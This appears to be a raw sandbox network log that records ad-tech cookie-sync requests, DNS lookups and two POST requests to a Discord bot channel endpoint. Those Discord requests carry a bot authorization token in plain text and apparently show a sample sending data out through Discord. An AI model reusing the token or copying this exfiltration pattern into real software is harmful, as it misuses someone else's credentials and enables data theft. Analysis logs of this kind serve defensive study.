Location: https://onetag-sys.com/match/?int_id=2&uid=LWMWFQEC-L-7WEQ&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA
Content-Type: text/html
content-length: 0
set-cookie: khaos=LWMWFQEC-L-7WEQ; Max-Age=31536000; Expires=Mon, 26 May 2025 02:06:58 GMT; Path=/; Domain=.rubiconproject.com; Secure; SameSite=None
set-cookie: audit=1|eqIrFoK8pvkqGeSmryjLr+uG4VpuV80IA9jJTbulz4imLMwpGzbQYADkkuc/PBty0ipZXqHNcSY6HGGggQcJmLp6s7mMhyFwi34ds25rRn0rRBEBPisuRls7PoCMm1RrkPOjiK8WWSVIfiHh0PmVdFTEKBpCoPt32lFc1xdA3s2zHUlTn4+khrs+vUH3ZwDenZ9pUtf2UnKXjnh2OTlYY75iArKOBvsezkDUt1JrCgqmx8T3JMcQprWZCLTkJk7zzvG9pNn0yOCg3y8JcpclgrcwgQ3TfQDGtMXTlFzS+T9tiM4vOxfeNTdYha0WrPfr9uL41kntzAik5djrSMxuXk7c6Vc9TIegLZDbNcb1GduM98tgrmUAYv8jYvKPv2EUMKVg14DlZCmdSnPhsBfB5lsMB8miAqDuJaB+q8tUJIzvjraHU3voBkKB7oDb8fsNpHi/Hz+BSfmwgHzirU1P8JTsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjLoZ/AoAIqEarIAEMnLhCCYzazmHkIiwPgrn2baEfBU2eODj4v00KLXkEXB/qe91pUNeKr87YBedwQH/dvZ/ahRXqwJyMw6JCeldM8vdEQ9TmYAsdpXe2eNMHXWhWCsCZw3rSg4rPxHgl8V1FftG3nRRv9VfoVjwNVGrgA/DJZqbViNZIQq9dFo4brIWoIZVuukug1XDhOH6si2/nrsngfA/bqdQiH84bxanOKQn7AKJnMv7ZzVEAzlyi9H2e0ZifccZ2hjZSa3/y6VdGtK7qu1JHmyx+1M8tlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjLft+pJJQ3iyAI4EhSMmHu15sA8sZgnZIy7x3abSeby2zWtBSiXqWEkh+IeHQ+ZV0VMQoGkKg+3faUVzXF0DezbMdSVOfj6SGuz69QfdnAN6dn2lS1/ZScpeOeHY5OVhjvmICso4G+x7OQNS3UmsKCqbHxPckxxCmtZkItOQmTvPO8b2k2fTI4KDfLwlylyWCtzCBDdN9AMa0xdOUXNL5P22Izi87F941N1iFrRas9+v24vjWSe3MCKTl2OtIzG5eTtzpVz1Mh6AtkNs1xvUZ24z3y2CuZQBi/yNi8o+/YRQwpWDXgOVkKZ1Kc+GwF8HmWwwHyaICoO4loH6ry1QkjO+OtodTe+gGQoHugNvx+w2keL8fP4FJ+bCAfOKtTU/wlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKMuhn8CgAioRqsgAQycuEIJjNrOYeQiLA+CufZtoR8FTZ44OPi/TQoteQRcH+p73WlQ14qvztgF53BAf929n9qFFerAnIzDokJ6V0zy90RD1OZgCx2ld7Z40wddaFYKwJnDetKDis/EeCXxXUV+0bedFG/1V+hWPA1UauAD8MlmptWI1khCr10WjhushaghlW66S6DVcOE4fqyLb+euyeB8D9up1CIfzhvFqc4pCfsAomcy/tnNUQDOXKL0fZ7RmJ9xxnaGNlJrf/LpV0a0ruq7UkebLH7Uzy2U7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKMt+36kklDeLIAjgSFIyYe7XmwDyxmCdkima+WVcS1g3g==; Max-Age=31536000; Expires=Mon, 26 May 2025 02:06:58 GMT; Path=/; Domain=.rubiconproject.com; Secure; SameSite=None
set-cookie: receive-cookie-deprecation=1; Max-Age=7776000; Expires=Sat, 24 Aug 2024 02:06:58 GMT; Path=/; Domain=.rubiconproject.com; Secure; HTTPOnly; SameSite=None; Partitioned;
GET

https://ssbsync-global.smartadserver.com/api/sync?callerId=5&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&us_privacy=&redirectUri=https%3A%2F%2Fonetag-sys.com%2Fmatch%2F%3Fint_id%3D107%26uid%3D[ssb_sync_pid]

Request

GET /api/sync?callerId=5&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&us_privacy=&redirectUri=https%3A%2F%2Fonetag-sys.com%2Fmatch%2F%3Fint_id%3D107%26uid%3D[ssb_sync_pid] HTTP/2.0
host: ssbsync-global.smartadserver.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://onetag-sys.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 302

content-length: 0
date: Sun, 26 May 2024 02:06:58 GMT
location: https://onetag-sys.com/match/?int_id=107&uid=2880508470074793702
set-cookie: pid=2880508470074793702; expires=Thu, 26 Jun 2025 02:05:58 GMT; domain=smartadserver.com; path=/; secure; samesite=none
GET

https://s.amazon-adsystem.com/ecm3?ex=onetag.com&id=97BuMkGTmKHAMYSzHR2ANvmtkbD_ifxHzAGg5KC4gxA

Request

GET /ecm3?ex=onetag.com&id=97BuMkGTmKHAMYSzHR2ANvmtkbD_ifxHzAGg5KC4gxA HTTP/1.1
Host: s.amazon-adsystem.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://onetag-sys.com/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

Response

HTTP/1.1 200 OK

Server: Server
Date: Sun, 26 May 2024 02:06:58 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
x-amz-rid: G33A12M0REP9J4R6FNCQ
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Content-Type,Accept-Encoding,User-Agent
Strict-Transport-Security: max-age=47474747; includeSubDomains; preload
DNS

169.98.55.23.in-addr.arpa

Request

169.98.55.23.in-addr.arpa

IN PTR

Response

169.98.55.23.in-addr.arpa

IN PTR

a23-55-98-169deploystaticakamaitechnologiescom
DNS

98.50.22.104.in-addr.arpa

Request

98.50.22.104.in-addr.arpa

IN PTR

Response
DNS

162.87.77.80.in-addr.arpa

Request

162.87.77.80.in-addr.arpa

IN PTR

Response
DNS

178.7.197.18.in-addr.arpa

Request

178.7.197.18.in-addr.arpa

IN PTR

Response

178.7.197.18.in-addr.arpa

IN PTR

ec2-18-197-7-178eu-central-1compute amazonawscom
DNS

149.156.173.69.in-addr.arpa

Request

149.156.173.69.in-addr.arpa

IN PTR

Response
DNS

170.55.17.81.in-addr.arpa

Request

170.55.17.81.in-addr.arpa

IN PTR

Response
DNS

8.213.145.82.in-addr.arpa

Request

8.213.145.82.in-addr.arpa

IN PTR

Response

8.213.145.82.in-addr.arpa

IN PTR

n-sysadmin-jumpbox-03feednewsopera technology
DNS

211.140.121.74.in-addr.arpa

Request

211.140.121.74.in-addr.arpa

IN PTR

Response
DNS

161.182.54.209.in-addr.arpa

Request

161.182.54.209.in-addr.arpa

IN PTR

Response
POST

https://discord.com/api/v9/channels/1244109081116151869/messages

Request

POST /api/v9/channels/1244109081116151869/messages HTTP/1.1
authorization: Bot MTIxNTQyMjc0OTk4ODg4NDU3Mg.G8QiY3.e2k047pCmhPxBH-tdaOfxVTB1BY3dSfZIT_sXY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sun, 26 May 2024 02:06:59 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=a269a3a41b0411efa003da3a9dc5d154; Expires=Fri, 25-May-2029 02:06:59 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1716689219.961
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x5ry6Ze5i7NGeTalBc%2Bf03snGi7e2byEtXCdd%2BzgcYzV55Wczkt8%2FRLnWmbdB5Az3Y7lD9%2FqQM3KWEtveI8FDwwnKgBxhxM60t2WTuRc3o3sWYg4VBMvVrs7puuh"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=a269a3a41b0411efa003da3a9dc5d154136d604027f13f2c3cb49ed76227ce7f6aba31b4b43e71d4e9228bd11549640a; Expires=Fri, 25-May-2029 02:06:59 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=55d759a11d4aec8aa70325f9a5eb696ccca32143-1716689219; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=JiqCW00HrLX94gUxgPmoEXOwUQkeRDMIJ_qujRpBPXs-1716689219087-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 889a35818db0636a-LHR
POST

https://discord.com/api/v9/channels/1244109081116151869/messages

Request

POST /api/v9/channels/1244109081116151869/messages HTTP/1.1
authorization: Bot MTIxNTQyMjc0OTk4ODg4NDU3Mg.G8QiY3.e2k047pCmhPxBH-tdaOfxVTB1BY3dSfZIT_sXY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sun, 26 May 2024 02:06:59 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=a26c34a21b0411efa38ebe1bd0ea6bb0; Expires=Fri, 25-May-2029 02:06:59 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1716689220.965
x-ratelimit-reset-after: 1.966
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WwiU%2FWjNh5cdiDTV87kY8sDOEsX6W%2Bdt0iEUhWLgTy%2BRQWc14mIkXZvAqK2b%2BoOBagneARSHbd4CvMK4ITaju1SFUk5xeUFXVnnDotxoGuQEJxabdoBe9wexV2Cp"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=a26c34a21b0411efa38ebe1bd0ea6bb00962b13a40677d22366719c1612baa3f80753cef016aa4448d98aee67992a8e6; Expires=Fri, 25-May-2029 02:06:59 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=55d759a11d4aec8aa70325f9a5eb696ccca32143-1716689219; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=iYzR9UVYibNm9uTANZxtlA.9ROKPJDugd99_XZe0uNk-1716689219103-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 889a3581c9af8867-LHR
GET

https://token.rubiconproject.com/khaos.json?

Request

GET /khaos.json? HTTP/1.1
Host: token.rubiconproject.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://eus.rubiconproject.com
Connection: keep-alive
Referer: https://eus.rubiconproject.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site

Response

HTTP/1.1 200 OK

P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-Control: no-cache,no-store,must-revalidate
Expires: 0
X-RPHost: d0cea2fb47f5ddedaddf61763f0aedb4
access-control-allow-credentials: true
access-control-allow-origin: https://eus.rubiconproject.com
content-type: application/json; charset=UTF-8
content-length: 7
DNS

vid-io.springserve.com

Request

vid-io.springserve.com

IN A

Response

vid-io.springserve.com

IN A

34.240.147.182

vid-io.springserve.com

IN A

54.155.201.109

vid-io.springserve.com

IN A

52.215.248.64

vid-io.springserve.com

IN A

52.211.62.22

vid-io.springserve.com

IN A

52.210.116.28

vid-io.springserve.com

IN A

54.73.34.103
DNS

vid-io.springserve.com

Request

vid-io.springserve.com

IN A

Response

vid-io.springserve.com

IN A

52.210.116.28

vid-io.springserve.com

IN A

34.240.147.182

vid-io.springserve.com

IN A

54.155.201.109

vid-io.springserve.com

IN A

52.211.62.22

vid-io.springserve.com

IN A

52.215.248.64

vid-io.springserve.com

IN A

54.73.34.103
DNS

vid-io.springserve.com

Request

vid-io.springserve.com

IN AAAA

Response
DNS

223.236.74.64.in-addr.arpa

Request

223.236.74.64.in-addr.arpa

IN PTR

Response

223.236.74.64.in-addr.arpa

IN PTR

chioutbraincom
DNS

182.147.240.34.in-addr.arpa

Request

182.147.240.34.in-addr.arpa

IN PTR

Response

182.147.240.34.in-addr.arpa

IN PTR

ec2-34-240-147-182 eu-west-1compute amazonawscom
DNS

sync.resetdigital.co

Request

sync.resetdigital.co

IN A

Response

sync.resetdigital.co

IN A

143.244.220.80

sync.resetdigital.co

IN A

138.197.63.78

sync.resetdigital.co

IN A

159.203.147.11

sync.resetdigital.co

IN A

143.244.222.249

sync.resetdigital.co

IN A

159.89.252.170

sync.resetdigital.co

IN A

165.227.251.217
GET

https://sync.resetdigital.co/csync?pid=rubicon&redir=https%3A%2F%2Fs2s.t13.io%2Fsetuid%3Fbidder%3Dresetdigital%26gdpr%3D1%26gdpr_consent%3DCP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA